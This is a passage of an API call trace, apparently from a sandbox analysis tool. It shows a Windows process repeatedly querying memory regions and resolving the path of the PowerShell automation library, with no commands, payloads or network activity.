	[0396.685] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.686] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.686] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.686] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.687] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.688] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.688] VirtualQuery (in: lpAddress=0x16bac0, lpBuffer=0x16c980, dwLength=0x30 | out: lpBuffer=0x16c980*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.688] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.688] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.689] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.689] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.689] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xf305f288, Data2=0x64f, Data3=0x4117, Data4=([0]=0x81, [1]=0x14, [2]=0x9d, [3]=0x90, [4]=0xd4, [5]=0xdc, [6]=0x9d, [7]=0x46))) returned 0x0
	[0396.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.690] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa975673b, Data2=0x1f1, Data3=0x4292, Data4=([0]=0x8c, [1]=0xfb, [2]=0xef, [3]=0x67, [4]=0x16, [5]=0xa7, [6]=0x2e, [7]=0x30))) returned 0x0
	[0396.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.693] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.694] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.694] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.694] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.694] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.041] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.041] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.042] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.042] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
